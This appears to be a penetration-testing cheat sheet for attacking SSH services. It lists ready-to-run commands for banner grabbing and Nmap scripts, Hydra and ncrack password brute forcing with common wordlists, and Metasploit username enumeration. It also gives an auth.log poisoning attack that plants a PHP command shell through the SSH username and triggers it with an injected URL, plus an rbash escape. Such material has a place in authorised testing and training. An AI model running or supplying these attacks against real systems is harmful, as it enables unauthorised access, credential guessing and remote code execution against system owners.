SSH 22

Banner Grabbing:

nc -vn <target_ip> 22
nmap -sV --script=ssh-hostkey -p22 <target_ip>

Nmap SSH Scripts:

ls -lh /usr/share/nmap/scripts/ssh
sudo nmap <target_ip> -p 22 -sV --script=ssh-hostkey

Hydra Brute Force:

sudo hydra -l <username> -P rockyou.txt -v <target_ip> ssh -s 22 -t 4

Good password lists:

/usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt

NCRACK:

ncrack -p 22 --user <username> -P ./passwords.txt <target_ip>

Using Found Private Keys:

sudo chmod 600 <key_file>
ssh -i <key_file> <user>@<target_ip>

Start/Stop/Restart SSH Server:

sudo service ssh start
sudo service ssh stop
sudo service ssh restart

Enumerate Users:

use auxiliary/ssh/ssh_enumusers
set rhost <target_ip>
set rport 22
set threads 1
set threshold 5
run

SSH Log Poisoning (Requires RCE Vulnerability):

Injected URL:

http://<target_ip>/search.php?id=/var/log/auth.log&cmd=<your_command>

Remote Code Execution (RCE) via Username:

ssh '<?php system($_GET["cmd"]);?>'@<target_ip>

Escape Restricted Shell (Rbash):

sudo ssh <user>@<target_ip> -t "bash --noprofile"

Enumerate usernames:

python ssh-username-enum.py <target_ip> -w usernames.txt

Forcing Specific Authentication Method:

ssh -v <target_ip> -o PreferredAuthentications=password

Last updated 1 year ago